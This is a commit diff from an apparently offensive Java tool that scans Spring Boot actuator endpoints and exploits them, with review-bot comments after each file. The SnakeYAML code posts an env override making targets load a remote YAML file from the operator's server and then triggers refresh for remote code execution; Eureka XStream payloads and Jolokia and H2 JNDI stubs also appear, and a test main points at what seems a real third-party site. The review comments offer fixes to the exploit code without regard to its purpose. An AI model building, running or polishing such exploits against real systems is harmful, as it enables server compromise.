
Commit 536502f

committed
EXP
1 parent 1d269e0 commit 536502f

7 files changed

Lines changed: 112 additions & 46 deletions


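--- a/src/main/java/com/drops/exp/EurekaXstreamRCEEXP.java
+++ b/src/main/java/com/drops/exp/EurekaXstreamRCEEXP.java
@@ -24,7 +24,7 @@ public class EurekaXstreamRCEEXP {
 *
 * @return:
 */
-public static boolean setRCEV1(String target, String vps, String port){
+public boolean setRCEV1(String target, String vps, String port){
 String boby = bobyV1 + vps + port + "/example";
 System.out.println(boby);
 if (EnvPost.isPostEnv(target)){
@@ -41,7 +41,7 @@ public static boolean setRCEV1(String target, String vps, String port){
 return false;
 }
 
-public static boolean setRCEV2(String target, String vps, String port){
+public boolean setRCEV2(String target, String vps, String port){
 String boby = bobyV2 + vps + port + "/example\"}";
 System.out.println(boby);
 if (EnvPost.isPostEnvV2(target)){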
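Review bot: Dropping `static` from `setRCEV1`/`setRCEV2` breaks any caller still written as `EurekaXstreamRCEEXP.setRCEV1(...)`, and the only new call site in this commit (AttackService) constructs the object and leaves the call commented out, so nothing on the new side exercises either method. The Javadoc above `setRCEV1` still ends in an empty `* @return:`; it should say what `true` and `false` mean for the operator (the body after `isPostEnv` lies outside the hunk, so I cannot state the contract here). `System.out.println(boby)` writes the full payload, including the operator's `vps` and `port`, to stdout rather than to the GUI log the rest of the tool uses; either route it through `Utils.log(...)` or drop the debug print before this is merged.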

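--- a/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java
+++ b/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java
@@ -27,8 +27,8 @@ public SnakeYAMLRCEEXP() {
 }
 
 public boolean sendExp(String target, String vps, String EchoType, boolean version){
-String echo = EchoType;
 String boby = "spring.cloud.bootstrap.location=http://" + vps + ":3456/" + EchoType + ".yml";
+String boby2 = "{\"name\":\"spring.cloud.bootstrap.location\",\"value\":\"http://" + vps + ":3456/" + EchoType + ".yml\"}";
 if (version){
 String url = URLUtil.getROOT(target);
 if (EnvPost.isPostEnv(url)){
@@ -49,7 +49,7 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
 String url = URLUtil.getROOT(target);
 if (EnvPost.isPostEnvV2(url)){
 if (RefreshPost.isRefreshPostV2(url)) {
-HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby);
+HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby2);
 if (re.isOk()) {
 HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");
 if (res.isOk()){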
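Review bot: `boby2` assembles a JSON document by string concatenation, so a `"` or `\` in `vps` or `EchoType` yields malformed JSON and the `actuator/env` POST fails with no hint why; `SpringBootInfoCheck` already parses with fastjson, so build it as `new JSONObject().fluentPut("name", "spring.cloud.bootstrap.location").fluentPut("value", "http://" + vps + ":3456/" + EchoType + ".yml").toJSONString()` (assuming that import is available in this file). The callback port `3456` is hard-coded in both bodies while `EurekaXstreamRCEEXP` takes a `port` argument; lifting it to a constant or parameter keeps the two EXP classes consistent. `sendExp` opens in the first hunk but its body runs past the second.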

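--- a/src/main/java/com/drops/main/AttackService.java
+++ b/src/main/java/com/drops/main/AttackService.java
@@ -1,7 +1,11 @@
 package com.drops.main;
 
 import com.drops.entity.ControllersFactory;
+import com.drops.exp.EurekaXstreamRCEEXP;
+import com.drops.exp.JolokiaLogbackRCEEXP;
+import com.drops.exp.JolokiaRealmRCEEXP;
 import com.drops.exp.SnakeYAMLRCEEXP;
+import com.drops.poc.EurekaXstreamRCEPOC;
 import com.drops.poc.SnakeYAMLRCEPOC;
 import com.drops.poc.SpringBootInfo;
 import com.drops.poc.SpringBootInfoCheck;
@@ -49,9 +53,36 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)
 SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
 return exp.sendExp(target,vps,echo,flag);
 }else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
+EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
+// return exp.
+}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
+JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
+
+}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
+JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
+
+}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
+
 
 }
 
+}else {
+if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
+SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
+return exp.sendExp(target,vps,echo,flag);
+}else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
+EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
+// return exp.
+}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
+JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
+
+}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
+JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
+
+}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
+
+
+}
 }
 }catch (Exception e){
 this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));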
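Review bot: The new `EurekaXstreamRCE`, `JolokiaLogbackRCE`, `JolokiaRealmRCE` and `H2DatabaseConsoleJNDIRCE` branches instantiate an EXP object and then fall out of the chain without returning, so `gadgetSend` silently continues to whatever follows the `catch` (outside the hunk) and the operator gets no signal that the gadget is unimplemented; until the calls are wired up, end each stub with `this.mainController.logTextArea.appendText(Utils.log(gadget + " EXP not implemented yet")); return false;`. The `else` branch added at new line 69 is a verbatim copy of the chain above it, including the `exp.sendExp(target,vps,echo,flag)` call, so whatever condition selects between them (its header lies outside the hunk) changes nothing; compute `flag` once and keep a single chain. The locals `jolokiaLogbackRCEEXP` and `jolokiaRealmRCEEXP` are unused, and `EurekaXstreamRCEPOC` is imported but not referenced in the visible code.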

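--- a/src/main/java/com/drops/poc/H2DatabaseConsoleJNDIRCEPOC.java
+++ b/src/main/java/com/drops/poc/H2DatabaseConsoleJNDIRCEPOC.java
@@ -18,7 +18,7 @@
 public class H2DatabaseConsoleJNDIRCEPOC {
 
 private final MainController mainController;
-SpringBootInfoCheck info = new SpringBootInfoCheck();
+
 
 public H2DatabaseConsoleJNDIRCEPOC() {
 this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());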

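--- a/src/main/java/com/drops/poc/SpringBootInfo.java
+++ b/src/main/java/com/drops/poc/SpringBootInfo.java
@@ -25,26 +25,26 @@ public class SpringBootInfo {
 List<String> pointListV2 = new ArrayList<>();
 static boolean SpringbootVersionV1 = false;
 String[] basicPoint = new String[]{"cloudfoundryapplication","hystrix.stream" };
-PropertiesBean properties;
+
 MainController mainController;
-SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
+SpringBootInfoCheck infoCheck ;
 public List<String> gadget = new ArrayList<>();
 List<String> gadgetExp = new ArrayList<>();
 
-public SpringBootInfo(List<String> pointListV1, List<String> pointListV2, String[] basicPoint, PropertiesBean properties, MainController mainController) {
-this.pointListV1 = pointListV1;
-this.pointListV2 = pointListV2;
-this.basicPoint = basicPoint;
-this.properties = properties;
-this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
-}
+// public SpringBootInfo(List<String> pointListV1, List<String> pointListV2, String[] basicPoint, PropertiesBean properties, MainController mainController) {
+// this.pointListV1 = pointListV1;
+// this.pointListV2 = pointListV2;
+// this.basicPoint = basicPoint;
+// this.properties = properties;
+// this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
+// }
 
 // public SpringBootInfo() {
 // }
 
 public SpringBootInfo(){
 this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
-
+this.infoCheck = new SpringBootInfoCheck();
 
 pointListV1.add("autoconfig");
 pointListV1.add("heapdump");
@@ -116,22 +116,22 @@ public SpringBootInfo(){
 public boolean doCheck(String target) throws MalformedURLException {
 String rootaddr = URLUtil.normalizeURL(target);
 try {
-if (infoCheck.CheckPointInfo(rootaddr)){
+if (this.infoCheck.CheckPointInfo(rootaddr)){
 this.mainController.logTextArea.appendText(Utils.log("检测到 Spring Boot 404 特征!"));
 }
-if (infoCheck.check404(rootaddr)){
+if (this.infoCheck.check404(rootaddr)){
 this.mainController.logTextArea.appendText(Utils.log("默认404页面返回200,无法准确爆破!"));
 }
 }catch (Exception e){
 this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));
 }
 try {
-infoCheck.checkActuatorPointV1(rootaddr);
-infoCheck.checkEnvPointV1(rootaddr);
+this.infoCheck.checkActuatorPointV1(rootaddr);
+this.infoCheck.checkEnvPointV1(rootaddr);
 
 if (!SpringbootVersionV1){
-infoCheck.checkActuatorPointV2(rootaddr);
-infoCheck.checkEnvPointV2(rootaddr);
+this.infoCheck.checkActuatorPointV2(rootaddr);
+this.infoCheck.checkEnvPointV2(rootaddr);
 }
 this.mainController.logTextArea.appendText(Utils.log("检测流程结束! "));
 }catch (Exception e){
@@ -146,6 +146,8 @@ public boolean doCheck(String target) throws MalformedURLException {
 
 void parseProperties(PropertiesBean properties){
 if (properties.getHaveInfo()){
+// this.mainController.logTextArea.appendText();
+// infoCheck.
 this.mainController.logTextArea.appendText(Utils.log("\tJVM信息:\t\t"+properties.getJvmName()));
 this.mainController.logTextArea.appendText(Utils.log("\t端口信息:\t\t"+properties.getServerPort()));
 this.mainController.logTextArea.appendText(Utils.log("\tJava版本:\t\t"+properties.getJavaVersion()));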
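Review bot: `parseProperties` here is now duplicated line-for-line in `SpringBootInfoCheck`, and the new `checkEnvPointV1`/`V2` call the check's copy, so this one appears to have no caller left; delete it or have one delegate to the other rather than maintaining two, and drop the `// this.mainController...` / `// infoCheck.` placeholder comments that were added inside it. The five-argument constructor is kept as a commented-out block next to the already commented-out no-arg one; dead code should be removed, version control keeps it. `SpringbootVersionV1` is a `static` field read by `doCheck` and presumably written by `setSpringbootVersionV1` in `SpringBootInfoCheck`, so a result from one scan leaks into the next `SpringBootInfo` instance; an instance field would scope it per target. The constructor now does `this.infoCheck = new SpringBootInfoCheck()` while `SpringBootInfoCheck` reads `info.pointListV1`, so if its `info` field is initialised with `new SpringBootInfo()` the two constructors recurse until StackOverflowError — worth confirming. `doCheck` continues past the second hunk.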

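--- a/src/main/java/com/drops/poc/SpringBootInfoCheck.java
+++ b/src/main/java/com/drops/poc/SpringBootInfoCheck.java
@@ -10,6 +10,7 @@
 import com.drops.utils.*;
 
 import java.util.Map;
+import java.util.Properties;
 import java.util.Scanner;
 import java.util.UUID;
 
@@ -78,7 +79,7 @@ public boolean check404(String target){
 // Spring Boot 1.x版本端点在根URL下注册。
 public boolean checkActuatorPointV1(String target){
 for (String point : info.pointListV1){
-if (SpringbootUtils.checkPoint(target, point)){
+if (this.SpringbootUtils.checkPoint(target, point)){
 this.setSpringbootVersionV1(true);
 }
 }
@@ -87,7 +88,7 @@ public boolean checkActuatorPointV1(String target){
 // Spring Boot 2.x版本端点移动到/actuator/路径
 public boolean checkActuatorPointV2(String target){
 for (String point : info.pointListV2){
-if (SpringbootUtils.checkPoint(target, point)){
+if (this.SpringbootUtils.checkPoint(target, point)){
 this.setSpringbootVersionV1(false);
 }
 }
@@ -96,8 +97,11 @@ public boolean checkActuatorPointV2(String target){
 
 // Spring Boot env端点存在环境属性覆盖和XStream反序列化漏洞
 void checkEnvPointV1(String addr){
-String url = URLUtil.normalizeURL(addr) + "env";
-SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
+String url = URLUtil.normalizeURL(addr) + "env";
+HttpResponse response = HTTPUtils.getRequest(url);
+PropertiesBean properties = this.EnvParser(this.scannerOutput(new Scanner(ResponseUtil.getBoby(response))));
+this.parseProperties(properties);
+SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
 if (!yamlrcepoc.hasSnakeYAMLRCE(url)){
 EurekaXstreamRCEPOC xstreamRCEPOC = new EurekaXstreamRCEPOC();
 if (!xstreamRCEPOC.hasEurekaXstreamRCE(url)){
@@ -117,8 +121,10 @@ void checkEnvPointV1(String addr){
 
 // Spring Boot 2.x版本存在H2配置不当导致的RCE,目前非正则判断,测试阶段
 void checkEnvPointV2(String addr){
-final String url = addr+"actuator/env";
-// HttpResponse response = HTTPUtils.getRequest(url);
+final String url = addr+"actuator/env";
+HttpResponse response = HTTPUtils.getRequest(url);
+PropertiesBean properties = this.EnvParser(this.scannerOutput(new Scanner(ResponseUtil.getBoby(response))));
+this.parseProperties(properties);
 SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
 if (!yamlrcepoc.hasSnakeYAMLRCE(url)){
 EurekaXstreamRCEPOC xstreamRCEPOC = new EurekaXstreamRCEPOC();
@@ -140,7 +146,7 @@ void checkEnvPointV2(String addr){
 
 }
 
-public PropertiesBean EnvParser(String result){
+public PropertiesBean EnvParser(String result){
 PropertiesBean propertiesBean = new PropertiesBean();
 try {
 JSONObject jsonObject = JSON.parseObject(result);
@@ -187,6 +193,17 @@ public String scannerOutput(Scanner scanner){
 }
 
 
+void parseProperties(PropertiesBean properties){
+if (properties.getHaveInfo()){
+// this.mainController.logTextArea.appendText();
+// infoCheck.
+this.mainController.logTextArea.appendText(Utils.log("\tJVM信息:\t\t"+properties.getJvmName()));
+this.mainController.logTextArea.appendText(Utils.log("\t端口信息:\t\t"+properties.getServerPort()));
+this.mainController.logTextArea.appendText(Utils.log("\tJava版本:\t\t"+properties.getJavaVersion()));
+this.mainController.logTextArea.appendText(Utils.log("\t用户名:\t\t"+properties.getUserName()));
+}
+}
+
 
 
 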
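Review bot: `checkEnvPointV1` and `checkEnvPointV2` hand `ResponseUtil.getBoby(response)` straight to `EnvParser` without looking at the response, so a 401/404 page or a null result from `HTTPUtils.getRequest` is parsed as if it were the env document and any failure surfaces only as whatever `EnvParser`'s catch does; guard with `if (response != null && response.isOk())` (the `isOk()` accessor the EXP classes already use) before building the `Scanner`, and put the `Scanner` in try-with-resources so it is closed. Both methods fetch `/env` themselves and then call `hasSnakeYAMLRCE(url)` on the same URL, which presumably requests it again; passing the already-fetched body along would halve the probes sent to the target. `this.SpringbootUtils.checkPoint(...)` only compiles if `SpringbootUtils` is an instance field of this class — if it is the utility class from `com.drops.utils.*`, the `this.` prefix must go. `java.util.Properties` is imported but not used in the visible hunks, and the `// this.mainController...` / `// infoCheck.` placeholder comments in the new `parseProperties` should be removed.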

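--- a/src/main/java/com/drops/utils/URLUtil.java
+++ b/src/main/java/com/drops/utils/URLUtil.java
@@ -47,17 +47,24 @@ public static String encodeURL(String target){
 }
 
 public static String getROOT(String target) {
-String result = null;
-URL url = null;
-try {
-url = new URL(URLUtil.normalizeURL(target));
-} catch (MalformedURLException e) {
-e.printStackTrace();
+String[] result = target.split("/");
+String res = "";
+int i = 0;
+for (String p:result){
+if (p.equals("")){
+p = "//";
+i += 1;
+}
+// System.out.println(p);
+res += p;
+i += 1;
+// System.out.println(res + " " + i);
+// System.out.println(i);
+if (i == 4){
+return res + "/";
+}
 }
-result = url.getHost() + ":" + url.getPort() + "/";
-
-System.out.println("getROOT result -> " + result);
-return result;
+return res + "/";
 }
 
 public static String getHost(String target){
@@ -75,25 +82,34 @@ public static String getHost(String target){
 }
 
 public static int getPort(String target){
-int result ;
+// int result ;
 URL url = null;
 try {
 url = new URL(URLUtil.normalizeURL(target));
 } catch (MalformedURLException e) {
 e.printStackTrace();
 }
-result = url.getPort();
-return result;
+String protocol = url.getProtocol();
+// System.out.println(protocol);
+if (protocol.equals("https")){
+return 443;
+}else if(protocol.equals("http")){
+return 80;
+}
+
+return url.getPort();
 }
 
 
 public static void main(String[] args) {
-String url = "127.0.0.1:922/encsa";
+String url = "http://smartms.zihome.com/actuator/env";
 String point = "sad";
-System.out.println(URLUtil.normalizeURL(url)+point);
-System.out.println(URLUtil.getHost(URLUtil.normalizeURL(url)));
-System.out.println(URLUtil.getPort(url));
-System.out.println(URLUtil.getPath(url));
+
+// System.out.println(URLUtil.normalizeURL(url)+point);
+// System.out.println(URLUtil.getHost(URLUtil.normalizeURL(url)));
+System.out.println(URLUtil.getROOT(url));
+// System.out.println(URLUtil.getPort(url));
+// System.out.println(URLUtil.getPath(url));
 }
 
 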